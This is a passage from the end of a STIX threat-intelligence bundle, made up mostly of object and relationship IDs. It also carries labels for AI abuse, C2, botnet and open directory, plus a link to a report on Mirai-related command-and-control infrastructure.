"attack-pattern--ab386774-9556-5bc2-8927-6d98193000ec", "attack-pattern--06cbe52b-abcb-5b54-a3ec-c553a82c7374", "attack-pattern--9b061dc5-a41f-538c-9521-8e98984351d2", "attack-pattern--e5cb41d1-15ac-5c86-bb7b-64f8f3e980ed", "attack-pattern--cf20d2c8-8603-5de7-9ff7-6907e88212b9", "intrusion-set--9ab283d5-b752-5462-b74a-392a7987951d", "infrastructure--214ad0bb-f57a-5827-96bd-39f62c91516a", "vulnerability--33d26914-f594-5da5-a6e5-24b04ab9a05c", "vulnerability--a6691a02-8776-5d2e-b9b0-50d95ffd1dce", "vulnerability--4d56e7a3-38a5-5c89-a858-26018e1d0119", "relationship--73c5e769-5821-5fb9-a341-75a9b0d2ae8d", "relationship--b6df5c41-a4d9-558f-8960-5bb35288454c", "relationship--e7cff098-dab2-575a-92ba-d2b63d46aa33", "relationship--aa96a485-1f10-5770-8912-980c39d56503", "relationship--38054beb-aaeb-5bec-897b-232bba654e9f", "relationship--ad61ae69-a281-5b92-9667-5b6e54c1d590", "relationship--ab7f9e77-db01-5412-81b5-7a039a539aed", "relationship--4dfcc3f8-5f2e-5222-b4a2-cabef3af442c", "relationship--b0253e43-fb8a-5fa9-96b5-e984b693f09e", "relationship--b0d8a163-1c0f-5098-b5c8-771772cfc3c1", "relationship--4773a54d-71a0-56fe-9c5a-96c81ea42d30", "relationship--a50455a8-4634-5529-84e0-8847510c2911", "relationship--0fd294f2-07d6-5bcc-91b7-d71c21caed0d", "relationship--8d0d8ad8-efff-517d-91e4-916fbfab5c86", "relationship--2adbb0f0-7700-555b-958d-ec5ac66196a2", "relationship--782612fe-6e29-5f9d-b1b6-215dd508f4a5", "relationship--96a357fe-e9aa-5901-98ff-da66a91aa9f5", "relationship--492a9196-916b-54f9-8b3a-9e67d09d2127", "relationship--4d364ba3-de98-5d19-a6d7-53edad0e7cff", "relationship--9e9fa600-0a5f-5630-8115-65ecd17d8e13", "relationship--68e8db71-8089-522c-b36c-9f94a6628360", "relationship--78471bb4-c374-5cc0-83a5-899db359b243", "relationship--837d915b-150c-5abd-b966-82662aa3e493", "relationship--0b5cd3cf-0725-545b-a715-6f414f13cfd6", "relationship--0b4c5682-ce27-548d-a52a-8758441f7188", "relationship--b792c0e6-5775-532c-8ae3-691cfae49420", "relationship--20e5667e-ec30-534a-ba1a-166c1eb714e2", "relationship--a064df39-d30c-59ee-9e44-a870abbe0ff9", "relationship--e587365b-699d-503c-8e41-d1684c5022ce", "relationship--cfc05f71-12b7-531e-80c4-90309bbc92da", "relationship--a0fef761-6109-5c88-b444-94022b7c45b5", "relationship--fb2d61ae-4d74-5fb8-8dfd-dd386168d11f", "relationship--d9998112-1cac-5cfb-98de-d628c00840dc", "relationship--48d15190-bacd-5a2b-ae5a-e7c748deb02b", "relationship--a85745eb-11f2-5736-ac8d-2122c6221553", "relationship--48d374c5-fa15-5914-8842-295d6017e625", "relationship--c27c978b-9563-53c2-9b5b-00f505ccbf36", "relationship--4dfb3518-00c2-5ae5-9ae8-6f231cf01d95", "relationship--86c449b0-9878-5b1e-a2c9-6096b32181c4", "relationship--33a99ab4-4d28-5606-9dc5-50533b9ac65f", "relationship--b0b05606-cbe8-57f0-955c-587fbb3e33bd", "relationship--42bf2d28-c2f1-54ea-81d3-b0d35c4e2922", "relationship--182ca275-d3d8-50a5-b347-deafd75360d8", "relationship--349affed-0554-5a79-a664-c79fdbab5e3c", "relationship--1da00a53-7feb-5197-aa66-110733ac121a", "relationship--60b0c086-8b26-5b47-b8dc-7997b33f4d2e", "relationship--b920ff5d-bf76-509e-b9c0-83af52ebb478", "relationship--bf16bec1-fb9b-5b26-bace-aaf09b59ac07", "relationship--378c35e7-3a8d-5ece-af0f-5ea3b98c8f3b", "relationship--c0512f4b-753d-5772-a070-4a53dc498d1b", "relationship--969748d1-21b4-589e-acea-4a402e820cce", "relationship--a8bdd18d-a618-5832-adb3-be11f2f6d8d5", "relationship--985e9d8f-801e-5bb1-a0b5-29052e9b7279", "relationship--862bc02c-c12a-5f9a-a79b-8347bb669122", "relationship--cf744091-781b-5cf0-93a3-9522facd9712", "relationship--d89e0f63-0daf-5033-b4e9-c04ab2066355", "relationship--8ee5ac72-a6c1-5572-a22c-a36177c4d60b", "relationship--d1981f9f-a72b-5dd1-9169-cff6497f76c3", "relationship--38b2670e-bdb5-593c-bb15-da73685ea808", "relationship--1c651ce3-24cc-503f-b594-ecc9d7f5a818", "relationship--7d76a362-701a-5b44-ac66-a29ea0a185ee", "relationship--f1e74a20-22a7-527b-ba9a-8f12d30beaaa", "relationship--96f1c610-2136-54b3-85af-cdad77cfaeac", "relationship--8f7391e0-09ee-5a6e-ba49-be0645c41dc5", "relationship--782a6c93-7042-5644-a572-ee5bf6eca9e6", "relationship--256fd1d4-f60a-5f99-8714-74adcde93708", "relationship--631696b6-0533-5442-b112-eb397840fe63", "relationship--effc21b7-8aa5-507b-99ea-09a35b354a3e", "relationship--791f3fa3-aa22-5564-ba13-51a9ea6edd7e", "relationship--ae9f13ee-f2f0-51eb-b053-54389b36494a", "relationship--70a29de1-ae87-5655-be58-21c349580a80", "relationship--234eda9c-a8ff-5e24-97ad-74265a421363", "relationship--3acc3bb2-0b6f-5130-b42a-d249a11466a3", "relationship--4aa1c9b2-b9dc-5b97-bed4-993ffe8e861c", "relationship--e2e08961-9f79-554e-b39b-54efd27fa27e", "relationship--267cfa62-0ee1-585c-88fa-9add598e9ced", "relationship--7cb694c5-cd13-5803-b72e-2172c9ddeb24", "relationship--ea47aa56-f22f-537b-b591-e548d2640f3f", "relationship--4a14affe-0b74-5be7-b326-be4f37b5ad65", "relationship--b000c79f-0c04-5737-abff-42c85caec75d", "relationship--f810be25-74b0-540f-8409-185e96c651e6", "relationship--7346f213-b5d1-5735-bfc2-767fa494c1a4", "relationship--8623f537-e065-5011-8aa2-48c78adc03f2", "relationship--428110b8-7ebd-53de-99d9-74ee81c407f9", "relationship--0f43702b-7d67-5f1e-a652-dcab069381f1", "relationship--0dd606a6-3506-5d90-9da4-caab57e25845", "relationship--150e92b1-d203-5492-b22a-850a3bd45a4d", "relationship--ceaf3148-8ca5-51df-bdd0-2b287e4a3c9c", "relationship--21d4ada3-be8b-5e8a-8742-445e9a8f621a", "relationship--fc638a09-5f8f-5a03-a57c-796d1bab3ab3", "relationship--6c7680ba-546f-52ca-a808-c6000e59670b", "relationship--1229ad2d-06b1-579e-ad01-9ab58e3b91c4", "relationship--946ba203-6261-5545-bea8-fa1d8479d6a4", "relationship--e9d09ea3-1676-569f-9be3-0271a5f894e0", "relationship--651f96aa-e3de-503f-ba4c-2ba371ef0f71", "relationship--d5bd8cae-4279-5001-a30d-f78ca77ee9fe", "relationship--4d9ac0e7-78b1-539f-875f-83b9fece5d24", "relationship--0012cf33-115e-5af0-9aa6-caea481e9ec0", "relationship--57a0fc67-1714-5cc9-bd1d-f45d9444d085", "relationship--0e83f645-fe7f-5903-b320-ebc3b1f9781d", "relationship--5dbc59ca-c7aa-580d-938e-b3f8edb040fe", "relationship--95cb60cd-c2a7-5611-9625-4d1d49dfb100", "relationship--08fd3bc9-40d1-5b02-9497-9a4d0a2170cb", "relationship--7fdfefde-fc2e-52ce-91f0-1819fc568d6a", "relationship--c7e2002d-5988-5176-b542-ab934942ab76", "relationship--2d6b4aeb-3aa8-5b7d-a6c5-33b6baa8ce47", "relationship--007b455a-814a-51a0-b372-27983b26133b", "relationship--6909bd83-a6bd-5972-8f75-882ac444f4c9", "relationship--b37978ac-adb6-5de2-9473-5bccb0517d94", "relationship--0c5c0fa6-c959-545d-a28a-9d5c70fec19e", "relationship--cf5684db-054f-5a1d-bda8-98d1a9f73ebb", "relationship--8140f544-d950-57e9-8d1a-f537c69429e5", "relationship--f1cd9cd1-22a1-58e7-80c2-5e81fdeff361", "relationship--23bc6026-f270-57b2-b4f4-1b136aba097a", "relationship--90b1ec40-76c9-58fb-a196-08fba40259d7", "relationship--1a7b65aa-fd9a-5fbd-96a9-5f0419af1714", "relationship--4ae346b5-1b18-5423-a5ee-022e2c52af48", "relationship--7ff8ca42-e709-500c-843d-fe3d06646452", "relationship--39678050-d607-5d96-b125-d99d0faeb780", "relationship--143b277d-6150-5b95-a646-3e39ad6783a4", "relationship--6c7b6c21-ebe1-5f03-8bcc-6c0ca0cb6e25", "relationship--f2494bd1-8228-5af6-aed8-4154c053fad6", "relationship--402cfb3a-3dd9-5ac6-b77b-30749e130753", "relationship--ad65eb84-b1bf-5530-ba57-8211ce49d13b", "relationship--a9f2cea8-10e2-503f-8ca9-1428b508cea5", "relationship--de123953-c674-5ea4-a76c-b74e671f61ab", "relationship--3d5c24b7-4331-54e3-977f-ddd6f8691b38", "relationship--200e26a1-b7d3-55b4-b10d-58f558e7a36a", "relationship--4e4a322e-a5ea-5621-b3fa-1d39538d413f", "relationship--db2b19a4-9ab6-5133-a381-db6305bd3722", "relationship--0f12eb83-566f-55fc-adb3-9d28555a2505", "relationship--1f82e84d-1e91-50f1-ba42-520c585a87b2", "relationship--168a0c12-7687-5283-b516-786978ce55fc", "relationship--e2788336-77ef-5cb0-82fd-888c374cf46c", "relationship--ad9dc6b6-1dac-5480-9dbb-5bd8d2d69ee3", "relationship--4f475503-fda9-59ab-8df0-58025bfc0bdd", "relationship--edc4e3a6-4b08-5a59-a90f-860c9a276151", "relationship--01693e52-996f-5648-8600-fc68ae08f38b", "relationship--cf8671e9-c79a-5242-aacd-d19c1f80fbd4", "relationship--0580a1fd-c556-5d55-a9bd-399ba4d73c4f", "relationship--7f893652-5a33-5619-85ee-e76a6e5663ee", "relationship--134057d6-683a-5600-a472-699be4e48e3c", "relationship--e784258c-7142-58b2-8eed-e7e8196c48af", "relationship--d5239e8a-018f-5d3e-84e8-838d5e81e1c3", "relationship--e4948dd9-5b4d-5e7e-b151-5e126ed9ad22", "relationship--2a4a7ee4-db68-52fa-8bbe-be12c1941af1", "relationship--e53af022-1a36-558d-bbf6-d71804ee2358", "relationship--6f228e4c-823f-5782-9216-9afa16afbc29", "relationship--9132284e-61ad-5a22-8ec0-3b728e08ba27", "relationship--24444c68-9c71-5b9a-8f70-3ad6c48e124d", "relationship--c84e11e9-48c4-5d43-a63e-3b0ce947b62c", "relationship--5a0cf930-1a0e-5546-a15a-5905b25d110f", "relationship--c085c2bb-7629-5221-a78f-1ed68070f45a", "relationship--7a8c10a2-dbf2-5399-aa32-58d997cebc36", "relationship--d012a36a-2cb3-52d2-86f9-9eaca86ea506", "relationship--2d9d58c7-e824-5901-9777-60061decd3f9", "relationship--67c85fa8-dcc9-5869-93bc-8cc0d4124898", "relationship--fcbabf59-a5b5-5628-9438-912a2302e018", "relationship--70b4daec-07f9-573b-8191-4bab7c475aa4", "relationship--f16cfd3c-f4d5-507b-b898-c99cd601013a", "relationship--3ca1ba79-0401-5a0e-a56d-cd7365619ae8", "relationship--96e0e53a-2d4f-5931-ac72-113b7b03304d", "relationship--7bbbb3da-98ae-5bfe-bc0a-3854da22b09e", "relationship--068ce0a4-1e2d-5cff-bdbc-1dbd970141b1", "relationship--c3bfd365-432d-5181-bffc-a1e6a2bdc06b", "relationship--0599a095-04ee-583a-b7b3-a528807c3f6f", "relationship--b12bc9de-22e3-5aa5-bea2-1b2ecf91cd77", "relationship--e7b896e6-1b09-52b4-bfa7-bd90024bde49", "relationship--327232ba-659e-502d-8ec2-e3a2924993ab", "relationship--ab03ba1e-39c6-59e1-b9b7-d103db70d21f", "relationship--29893cd5-be87-58b8-8c09-f5b222c34945", "relationship--ff53d6a9-2b0a-5eb2-9c08-30d8e5676e12", "relationship--1549275d-1944-59ca-a2aa-72f9d4c40893", "relationship--5b731300-01f4-52f7-8176-fa83df4e0a8c", "relationship--bae82604-8a1a-55ac-ac9e-1c7248f0916f", "relationship--ceb7bbf8-de44-504e-afc7-6b7597fcf3c1", "relationship--68ee12b7-1744-5511-995c-345e8f9f3611", "relationship--3b222847-4199-5829-b192-29c9cd9a5fdb", "relationship--2e965e55-7b9b-5f6d-ba17-e109c71d9cbc", "relationship--41338694-f1f8-54ac-91ce-67f7848fa3f7", "relationship--ededecbb-d661-560f-bbb2-b9f8cee8d1e7", "relationship--c5fb197f-af2c-5c8c-8515-38b358689eb6", "relationship--d910411c-6cd2-5270-b843-745797f8369d", "relationship--ec46c907-7aa1-53d7-a5f3-1edb52d28849", "relationship--3a56ee4a-9432-5689-ba0e-256b31ae23d5", "relationship--462cec5e-1790-50c8-ba8d-35c984ff2a85", "relationship--6cdea6ab-520f-561b-96e2-f774a288cb7c", "relationship--17f774b2-98e9-52d2-be23-467cf2b0bd30", "relationship--c8d36cb1-08fe-51bb-9ba0-dbf3096cded2", "relationship--75a76c81-1f3b-5c65-900d-2a69c29453a8", "relationship--3088b3bc-0db9-5266-b8ef-e86d759b84e0", "relationship--6bce76fc-5583-51a9-b2e6-450d9fcd3289", "relationship--fa7cffc7-08f4-595b-a8a0-542e02136ffb", "relationship--c6325bbd-6f52-56f8-9d1e-3fa8a4b8b3bd", "relationship--e4818eab-07f7-55c8-8d18-3f6008df897e", "relationship--45bc44ef-1e95-5115-af55-941c7d0c32af", "relationship--b1697ccd-6732-52f7-8b11-028bce04660c", "relationship--2fe82f1c-b87a-5b48-bb45-21a6b5f5813e", "relationship--82648bfe-e191-5a60-ab7e-69fc83ea0868", "relationship--61e6187c-6498-555d-866d-a8c64fc26f29", "relationship--ec419324-ba09-5db0-b084-7cddef75d41c", "relationship--926a691b-1762-5ca5-a765-d34aa4c6a6a1", "relationship--07b009cd-e86d-58e4-9f0c-258856391a2d", "relationship--bddb56ef-9abe-5116-bdb4-daeea5e96487", "relationship--edff136e-d09e-53a7-bf00-5ef707146a3a", "relationship--56427d0d-5ea9-52e9-aedb-d1c39c337fce", "relationship--777b5b8e-e6a3-5fc2-99a7-aa5a52fa15d5", "relationship--7ae4cc80-9178-5d7d-a98e-0c222c4297d5", "relationship--1b7b0ee7-3285-50c8-b268-bd77b206153b", "relationship--b0e4774b-0e42-5604-b956-e7f586fbb8d7", "relationship--f0a881fa-caeb-5d31-8e69-f45f6461f9c0", "relationship--a83bbf4e-1005-573c-a108-fe8eb3709ae6", "relationship--d578966e-3496-5af8-8ef4-0a1f32fc5f08", "relationship--e236067a-4482-54fd-ae1e-cc58bf18715f", "relationship--bcd149e4-c3e5-5965-83ce-e35a6c402c52", "relationship--bd130291-7e14-5cda-b4ac-e0f4c8938c90", "relationship--fb1dd2cd-2b20-5f31-8bb6-a8361f7b695a", "relationship--ef373377-2335-51d2-9bb9-eecd64ad7697", "relationship--94f9e084-2508-5507-b5c7-a5ba6416ccaa", "relationship--1b40fc6f-3465-5cae-8068-098a9406514f", "relationship--25f0d18f-5251-59ee-bd1f-a4655b79cc7b", "relationship--4c539f4b-de9f-5372-95f0-69d9a3cffee6", "relationship--e5156cf0-6473-58a8-b804-062c3bc2ca4a", "relationship--12f22361-d45e-57e8-bde5-ce9fdd3daaa7", "relationship--d5816fbb-0cda-547b-99b7-a9a15af16e7d", "relationship--24567532-262d-565c-a25c-b341ec79ab5c", "relationship--40e5ce04-c0ba-55b1-bee1-cb89d4078c71", "relationship--91bada52-5b92-5ef4-81e6-929e2fabf56f", "relationship--b34cea2a-0558-5bee-a6c9-0e983f14aa28", "relationship--bc2dcf0a-66b3-589d-8114-922fccf05f93", "relationship--a3f7c8b4-e6f2-5452-baf6-c0d6d84383a5", "relationship--741a8240-7583-5199-aa94-f5fb7e6bb389", "relationship--d9a3fa93-fba1-540b-ab3a-b88cea227681", "relationship--57f62990-79e4-58aa-9760-7178618406f7", "relationship--3105be12-ff41-5667-b445-143f37118cd7", "relationship--93784f09-f247-5b6b-8511-6d3e009e36dd", "relationship--f5007f4e-25be-586c-8dbe-a62fb281a77a", "relationship--41c82927-9195-54fd-93c4-ecca1a3639ab", "relationship--71ccaff2-a988-571e-a7f7-32dafb821b5f", "relationship--9c274bcb-3ef3-584b-9a94-60288602469e", "relationship--bd66fe0f-83e9-5ee7-b2a6-3bf02954b685", "relationship--c80e23bc-6dbb-5ad2-9002-2ea1510fbbac", "relationship--1aa12f5d-c68f-5fb4-aa78-c7a75c7ea968", "relationship--95eefd3c-8d34-5a33-a46d-44559b91dc98", "relationship--fda7f067-128d-5283-90ea-17a2dbbed29c", "relationship--15692a3e-aa6a-5f0e-b58f-493eb0e93f7b", "relationship--b52f5b8e-e4bb-5670-b310-e1378da1f655", "relationship--0cc2d3d4-482f-5c72-9e96-0798e5aa902f", "relationship--85d88658-cba3-5fca-a16b-87dc730a5fb2", "relationship--c68acf25-3948-5f0b-85a7-93762034b84b", "relationship--e0e45ffa-c649-5381-8b0b-53b95e75819d", "relationship--ea183149-175a-5b8d-83d1-a69f917e4da6", "relationship--20dae6dc-cbb0-5695-9a5a-569389e771ca", "relationship--f7e9ccbc-3af7-5909-a862-1ba85e9ec5dc", "relationship--88c2084c-caf3-5805-97f6-ab0f466bd7f0", "relationship--1be4b2f6-d8d2-54ec-8b24-553ea4a859f8", "relationship--72adb26f-6cdd-5231-b02a-830b39aecee9", "relationship--a8cf0631-cdad-5eec-bc3c-81cd2432675f", "relationship--060a2d2d-bfae-5dd8-af93-9bdf41038bfa", "relationship--90c68280-9d95-5dab-9fdd-d37ef5d4020a", "relationship--373e08e1-ae4d-5e61-b977-2c8a9026793b", "relationship--552a7143-fb67-55d1-a169-e97c90b99ea1", "relationship--052ca297-a53c-568a-a27c-1ca3efd318d5", "relationship--c532716f-c999-5b8e-9039-9560fc670bc2", "relationship--f5a58a68-f960-5ee6-8532-5578456e02f6", "relationship--b6a50337-4c68-5719-bc05-e65194677d36", "relationship--7920274a-8ea5-575c-b3fc-60dca3ca493d", "relationship--7b4f49a8-14ee-59a2-ab5d-3bf3de461bd5", "relationship--581771e2-ca24-5086-bc0b-4915f8d4085e", "relationship--c38d35c2-750e-5ed7-9a0e-6cc1bfae801b", "relationship--1c443b74-d57a-5a77-a7c6-1f9e941af923", "relationship--9f1104f8-a442-57c0-b7e6-f60cce684046", "relationship--4b22d609-6dc4-5593-a0b2-6f13a85bea69", "relationship--5cc3066b-d353-550b-9727-8bbce0e5fc9f", "relationship--634a9bf2-1378-5e2f-86a7-421d42d5961a", "relationship--61d5c05d-1834-5228-8459-6356d14fa948", "relationship--36125cd0-9444-55d7-9fc4-078787d29d06", "relationship--2e81034a-84be-5203-8905-4a48bf28ff08", "relationship--0a7c7c86-9294-5299-a5d9-1e757b77306b", "relationship--ce53e38a-6de1-5d99-83eb-e19a53dc10b3", "relationship--232b546a-a0ae-5d57-98f0-827c5fbb92d4", "relationship--711d0425-5df5-53fd-b00c-419590222097", "relationship--2c4f5eb6-710f-5d41-aab7-bac48f50faac", "relationship--22a3b611-2349-5aaf-a6d9-b42ccd905b62", "relationship--c36e2901-2907-53c9-9a96-bf3819fa9b3f", "relationship--f4dce50a-d1d9-5841-ba14-f0cfbdfd1aaf", "relationship--7f780239-4075-5415-9d7f-ca2dee33d7b9", "relationship--e04b5694-75e1-5fad-8db6-b11ff1b5f0e2", "relationship--cbc48bed-2ff0-50ab-8c2a-812d0b7a5ffd", "relationship--92ba2964-4c11-5cbe-b8ce-cecfa224f7b4", "relationship--7803945b-b814-594a-8d32-68d0ccb0db63", "relationship--ecf6b783-7cd4-51fa-bb23-330b0ae51183", "relationship--6fa79902-5287-5689-9944-55fd470c0f34", "relationship--ed4ecb8d-b959-58a9-894f-43e835cbd0f7", "relationship--17de8a5f-7698-52dd-a8a2-55516cf867ec", "relationship--670dbe0f-35f7-54a8-a975-a99dec256d97", "relationship--03ad32bb-fc33-5264-8734-f9c2dd144128", "relationship--afb15445-9bc9-5f6c-8f39-6418bc8ed435", "relationship--18cb0255-d49c-521b-a7f8-19415d6937b3", "relationship--7f70ad3c-b2da-51f3-9adf-de104f8c3d88", "relationship--38d0f634-3175-53aa-b70f-b7dd5233a222", "relationship--73af3284-2d62-5316-90c4-ff50ee0d003a", "relationship--7f409026-05fa-5416-b3b0-2a85f91f70b9", "relationship--b7bdd70a-afcb-5772-aef6-9db446c676d5", "relationship--bcab102a-0789-5a33-98e5-61431e22fb73", "relationship--fe4c1631-bf19-5cdf-9e5e-d79d170ac7c1", "relationship--ca2182dc-8bcd-569b-9762-d2818c3fbe88", "relationship--bd153ee3-ccc9-5e98-92d8-5e0da024b818", "relationship--e8b08db8-e676-5006-b060-4fdb32f54b04", "relationship--96fe2f47-01cd-5b94-b0fe-12c8bf231214", "relationship--1bf27ad6-8e5a-5523-8780-b4543c764e8d", "relationship--4c7dd529-24c9-53f2-b52a-9a732815cdca", "relationship--cd2f26dd-b598-5ce6-ade1-bc5ff8c06177", "relationship--8bf9dd93-eb36-57e7-913b-523bc2a4ff3a", "relationship--c047e249-4c36-5892-a8a5-a3f4b1b300c8", "relationship--044d908c-7a6e-5cbc-a5a4-cd5882a1a10d", "relationship--1bfd09d2-b356-52b1-ad03-75671e09d268", "relationship--b0e8d224-50dd-5bae-bb10-6193e23eb300", "relationship--1873ef6c-fa91-5fcd-8a4b-d76e4479c2d0", "relationship--2ebf69b1-716e-5ab6-bc61-811e3a176f22", "relationship--95236636-c3b0-5635-9b03-e2931fc325c5", "relationship--9b05460a-eb70-590e-b89e-0b3dd4c8810e", "relationship--c2a3b153-d479-50c3-a3c4-aedec6c47588", "relationship--68b8cbf4-452a-5bcd-80c7-02e1f8a388a3", "relationship--075ef898-4f98-5e06-a47b-cb9efc6f5c8d", "relationship--408b4ac7-340a-5ce9-966c-06be6584c56a", "relationship--36f7fae4-0bd1-538c-af82-9f8b3673513f", "relationship--b8d8d115-bf93-5b54-8d22-49b8fe7fff2e", "relationship--74f99078-79a2-504a-9ccf-d4cea89b9ecb", "relationship--6990b43a-03e0-5cbb-a415-32f81fc69e66", "relationship--5cb71618-611f-5ed0-a966-0613c403d4b9", "relationship--a1513bb9-d250-58b0-b96a-9a3ef290fabb", "relationship--383b219e-8093-5619-96da-46177ca185a1", "relationship--50a229d2-c687-5c46-a427-029ff6c279d4", "relationship--446be04b-31b1-55b1-b9e7-1df5920a85ce", "relationship--e33da502-4afa-52b7-940f-fa18c809bb0f", "relationship--09370dd8-307e-58b3-8860-d6a6a1767aca", "relationship--183b6ba9-595b-5edb-8a61-a74465afce0f", "relationship--b8ccbab5-46c1-533d-81ec-bc4b7f148181", "relationship--23749f7b-1a57-5439-b491-28f824585aca", "relationship--774404e2-f294-5ce1-9c27-694fb4afedf6", "relationship--c1ca78b8-85bd-57bb-9572-babdd0756f0e", "relationship--1e06aa4a-8e7a-51d6-abed-0c2733201dca", "relationship--6b8fcef0-5777-55dc-85a8-cca2a790a37e" ], "labels": [ "AI Abuse", "C2", "Botnet", "Open Dir" ], "external_references": [ { "source_name": "The Hunters Ledger", "url": "https://the-hunters-ledger.com/reports/rovodev-mirai-matrix-c2-87.106.143.220/" } ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] } ] }